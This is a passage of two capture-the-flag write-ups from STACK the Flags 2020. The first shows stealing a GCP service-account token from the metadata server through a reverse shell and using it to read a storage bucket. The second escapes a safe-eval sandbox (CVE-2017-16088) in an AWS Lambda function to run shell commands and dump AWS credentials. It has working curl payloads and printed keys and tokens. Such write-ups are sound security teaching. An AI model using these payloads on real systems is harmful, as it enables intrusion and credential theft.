        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    }
}

root@79e8f1cff449:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
{"access_token":"ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY","expires_in":3211,"token_type":"Bearer"}

Method 2: Via gsutil

Using the reverse shell, follow the installation steps for gsutil and then run the following command:

root@79e8f1cff449:/workspace# gcloud auth application-default print-access-token
ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY

Getting the Final Flag From Bucket

Awesome! We managed to obtain the temporary access token for the default GCP Cloud Build service account!

Let’s test to see if the GCP Cloud Build service account has the storage.buckets.list permission:

$ curl 
https://storage.googleapis.com/storage/v1/b/punggol-digital-lock-key/o?project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY
{
  "kind": "storage#objects",
  "items": [
    {
      "kind": "storage#object",
      "id": "punggol-digital-lock-key/last_half.txt/1607586270019961",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key/o/last_half.txt",
      "mediaLink": "https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media",
      "name": "last_half.txt",
      "bucket": "punggol-digital-lock-key",
      "generation": "1607586270019961",
      "metageneration": "1",
      "contentType": "text/plain",
      "storageClass": "STANDARD",
      "size": "17",
      "md5Hash": "WviwTGRF7YEzWXqehPCbHg==",
      "crc32c": "RtRJWw==",
      "etag": "CPmCyMT1wu0CEAE=",
      "timeCreated": "2020-12-10T07:44:30.019Z",
      "updated": "2020-12-10T07:44:30.019Z",
      "timeStorageClassUpdated": "2020-12-10T07:44:30.019Z"
    }
  ]
}

We finally see the second half of the flag stored as an object in the punggol-digital-lock-key bucket!
Does it also have the storage.objects.get permission?

$ curl https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media&project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY
4pPro4ch_Is_G00d}

Yes it does! And there we have it! Combining both pieces of the flag together, we get:

govtech-csg{Mult1_Cl0uD_4pPro4ch_Is_G00d}

Complete Attack Path

Here’s an overview of the complete attack path for this challenge: Overview of Attack Path

Thanks for reading my final write-up on the challenges from STACK the Flags 2020 CTF!

It was fun solving these cloud challenges and gaining a much better understanding of the various services offered by cloud vendors as well as knowing how to perform penetration testing on cloud computing environments.

Here’s a write-up on a cloud challenge titled Hold the Line! Perimeter Defences Doing It's Work! which I solved in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). Unsurprisingly, there were quite a number of solves since the challenge is rather simple and fairly straightforward.

Those that had analysed the arbitrary JavaScript code injection vulnerability in Bassmaster v1.5.1 (CVE-2014-7205) as part of Advanced Web Attacks and Exploitation (AWAE) course/Offensive Security Web Expert (OSWE) certification will definitely find the injection vector somewhat familiar for this challenge.

This challenge is written by Tan Kee Hock from GovTech’s CSG :)

Hold the Line! Perimeter Defences Doing It’s Work! Cloud Challenge

Description:
Apparently, the lead engineer left the company (“Safe Online Technologies”). He was a talented engineer and worked on many projects relating to Smart City. He goes by the handle c0v1d-agent-1. Everyone didn’t know what this meant until COViD struck us by surprise. We received a tip-off from his colleagues that he has been using vulnerable code segments in one of a project he was working on! Can you take a look at his latest work and determine the impact of his actions! Let us know if such an application can be exploited!

Tax Rebate Checker - http://lcyw7.tax-rebate-checker.cf/

Introduction

Let’s start by visiting the challenge site.

Tax Rebate Checker

Examining the client-side source code, we can see that the main JavaScript file loaded is http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js, which appears to be webpack-ed. Luckily for us, the source mapping file is also available to us at http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js.map.

You may have heard of Webpack Exploder by @spaceraccoonsec which helps to unpack the source code of the React Webpack-ed application, but are you aware that Google Chrome’s Developer Tools (Chrome DevTools) supports unpacking of Webpack-ed applications out of the box too?

Using Chrome DevTools, we can inspect the original unpacked source files by navigating to the Sources Tab in the top navigation bar, then click on the webpack:// pseudo-protocol in the left sidebar as such:

Analyse Webpack JavaScript Files Using Chrome DevTools

The source code for index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import React from 'react';
import ReactDOM from 'react-dom';
import axios from 'axios';

class MyForm extends React.Component {
  constructor() {
    super();
    this.state = {
      loading : false,
      message : ''
    };
    this.onInputchange = this.onInputchange.bind(this);
    this.onSubmitForm = this.onSubmitForm.bind(this);
  }

  renderMessage() {
    return this.state.message;
  }

  renderLoading() {
    return 'Please wait...';
  }

  onInputchange(event) {
    this.setState({
      [event.target.name]: event.target.value
    });
  }

  onSubmitForm() {
    let context = this;
    this.setState({
      loading : true,
      message : "Loading..."
    })
    // any changes, please fix at this [https://github.com/c0v1d-agent-1/tax-rebate-checker]
    axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
      age: btoa(this.state.age),
      salary: btoa(this.state.salary)
    })
    .then(function (response) {
      context.setState({
        loading : false,
        message : "You will get (SGD) $" + Math.ceil(response.data.results) + " off your taxes!"
      })
    })
    .catch(function (error) {
      console.log(error);
    });
  }

  render() {
    return (
      <div>
        
        <div>
          <label>
            Annual Salary : <input name="salary" type="number" value={this.state.salary} onChange={this.onInputchange}/>
          </label>
        </div>
        <div>
          <label>
            Age : <input name="age" type="number" value={this.state.age} onChange={this.onInputchange} />
          </label>
        </div>
        <div>
            <button onClick={this.onSubmitForm}>Submit</button>
        </div>
        <br></br>
        <p>{this.state.loading ? this.renderLoading() : this.renderMessage()}</p>
      </div>
    );
  }
}
ReactDOM.render(<MyForm />, document.getElementById('root'));

We can see that there is a comment pointing to a GitHub Repository at https://github.com/c0v1d-agent-1/tax-rebate-checker.
Even if this comment is not provided, we will still be able to find this repository easily by:

  • Searching for c0v1d-agent-1 on GitHub
  • Searching for tax-rebate-checker on GitHub

Tax Rebate Checker GitHub Search

Back to the source code of the React application, we also see the following code:

1
2
3
4
axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
    age: btoa(this.state.age),
    salary: btoa(this.state.salary)
})

We discover the use of cors-anywhere proxy, a service which basically helps to relay the request to the target URL and adding Cross-Origin Resource Sharing (CORS) headers. In other words, the target URL is https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker.

Examining the target URL carefully, we can observe that it is a REST API in Amazon API Gateway. Amazon API Gateway is also often used with AWS Lambda, which is something worth noting before we move on to explore what’s in the GitHub repository.

Analysing GitHub Repository

At https://github.com/c0v1d-agent-1/tax-rebate-checker, we see a Node.js application.
The default README mentions Deploy to AWS Lambda service, which is what we noted earlier on already.

Let’s look at the source code of the application. The source code of index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
'use strict';
var safeEval = require('safe-eval')
exports.handler = async (event) => {
    let responseBody = {
        results: "Error!"
    };
    let responseCode = 200;
    try {
        if (event.body) {
            let body = JSON.parse(event.body);
            // Secret Formula
            let context = {person: {code: 3.141592653589793238462}};
            let taxRebate = safeEval((new Buffer(body.age, 'base64')).toString('ascii') + " + " + (new Buffer(body.salary, 'base64')).toString('ascii') + " * person.code",context);
            responseBody = {
                    results: taxRebate
            };
        }
    } catch (err) {
        responseCode = 500;
    }
    let response = {
        statusCode: responseCode,
        headers: {
            "x-custom-header" : "tax-rebate-checker"
        },
        body: JSON.stringify(responseBody)
    };
    return response;
};

Looks like our input supplied as a JSON object containing age and salary are being safeEval().

The safe-eval package is known to be vulnerable in the past, so let’s also check the package.json file to see what version of safe-eval is being used:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{
  "name": "pension-shecker-lambda",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "safe-eval": "^0.3.0"
  }
}

Indeed, the application uses safe-eval v0.3.0, which is a vulnerable version.

Crafting the Exploit Payload

Let’s examine the proof-of-concept exploit script for CVE-2017-16088 for bypassing the safe-eval sandbox:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

This seems to return the process global object which allows us to control the current Node.js process.
Even though safe-eval prevents use of require() directly, we can bypass this restruction by using process.mainModule.require(), which provides an alternative way to retrieve require.main.

Now that we have a good idea on how to perform remote code execution on the AWS Lambda function, let’s also take a closer further at the suspicious GitHub issue at https://github.com/c0v1d-agent-1/tax-rebate-checker/issues/1

One of the libraries used by the function was vulnerable.
Resolved by attaching a WAF to the prod deployment.
WAF will not to be attached staging deployment there is no real impact.

Recall that the application at http://lcyw7.tax-rebate-checker.cf/ issues requests to https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker, which effectively forwards incoming requests to https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker – the prod stage!

If there’s a WAF on the prod stage, perhaps we can first target the non-protected staging deployment first and attempt to bypass the WAF if need be.

Before we can try to obtain remote code execution on the AWS Lambda function instance, we need to correctly format our input to the server.
As discussed previously, the Tax Rebate Checker application accepts a JSON input with both age and salary Base64-encoded.
Now, let’s use curl to run the AWS Lambda function on the staging deployment to try to obtain the environment variables set in the AWS Lambda function instance:

$ curl -X POST \
    -H 'Content-Type: application/json' \
    https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/staging/tax-rebate-checker \
    --data '{"age":"'$(printf "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('env').toString()" | base64 -w 0)'","salary":"'$(printf 1 | base64)'"}'
{"results":"AWS_LAMBDA_FUNCTION_VERSION=$LATEST\nflag=St4g1nG_EnV_I5_th3_W34k3$t_Link\nAWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjENj//////////wEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgDbiXQPR7pS/1Jlq8+CvWJEvBWEdzDgMZgmKXB6MbNzUCIFTQNbDFdxZ0qdOmTskWzFOeLpH12FinODzQ8XWo7CdNKtEBCHEQABoMNjQyOTk4NDY5NzM2IgzR7/iDouxfR0H3mQkqrgFHKpR/iXFoOCMF3wtocpFugLFNFVy+LMmgO6JFK56vSGq6zGwzepfYZTV7vLvRauJG9Y9e4o10bLznWugZt3RyH4cWvvHURygQsI5x8BRFMHtqNna7Q/lSWUJIancjx07sHZimJzdRO1SJu5PTu9wI2NFCW6uSKq6z/hHf0Ed8uCMAnkOtGHuY7jfoC2tWNPlByvrEW2mQzBFFgj2DTL/GdFSpS351lFD35am7nVQwibHH/gU64QHk9LffR6ZXw66N/7g5BRYhWGdKyz53O04vrFmttDusAhofGi8T74C1/3x096S1NtASZfVj3YmDwMYOQ1j4D6wEp8CUh5vc7FhQr9l9E8Zdvt78jqyx8l4Wto3UMirBgJDtfEqq5TbcaDP9FM9l1dInGC9Ch6YLJHIRl9Lwctj0s8pveOj0FTN29/PhpkHGWzl4SYSHKOAj/7h1k2J8Sx1JdtyDTKu+X6ACp1uxwDK2k2W2bnrCGVQ/3C2dTzoAINtX9RSk8DcBczXM75/cSi+3u+ClT3SMlBVzUmlPsm90G7U=\nAWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/tax-rebate-checker\nLAMBDA_TASK_ROOT=/var/task\nLD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\nAWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\nAWS_LAMBDA_LOG_STREAM_NAME=2020/12/10/[$LATEST]36472aa2e8e049cfad80aec03f1cae7f\nAWS_EXECUTION_ENV=AWS_Lambda_nodejs12.x\nAWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000\nAWS_LAMBDA_FUNCTION_NAME=tax-rebate-checker\nPATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\nAWS_DEFAULT_REGION=ap-southeast-1\nPWD=/var/task\nAWS_SECRET_ACCESS_KEY=drKOGJQgV4HeWciBrP9CgYyAoJrdoFtTHwg0X//f\nLANG=en_US.UTF-8\nLAMBDA_RUNTIME_DIR=/var/runtime\nAWS_LAMBDA_INITIALIZATION_TYPE=on-demand\nAWS_REGION=ap-southeast-1\nTZ=:UTC\nNODE_PATH=/opt/nodejs/node12/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task\nAWS_ACCESS_KEY_ID=ASIAZLNNSARUIMCNBHX3\nSHLVL=1\n_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2\n_AWS_XRAY_DAEMON_PORT=2000\n_X_AMZN_TRACE_ID=Root=1-5fd1d8f0-7f0800a731b13cf00a3c8db7;Parent=4c8bd2bd54f1fb14;Sampled=0\nAWS_XRAY_CONTEXT_MISSING=LOG_ERROR\n_HANDLER=index.handler\nAWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\n_=/usr/bin/env\n3.141592653589793"}

Note: The -w 0 arguments for base64 command is required to disable line-wrapping and introducing newlines in the input.

Awesome! We found the flag environment set to St4g1nG_EnV_I5_th3_W34k3$t_Link, and we can get the final flag by wrapping it with the flag format:

govtech-csg{St4g1nG_EnV_I5_th3_W34k3$t_Link}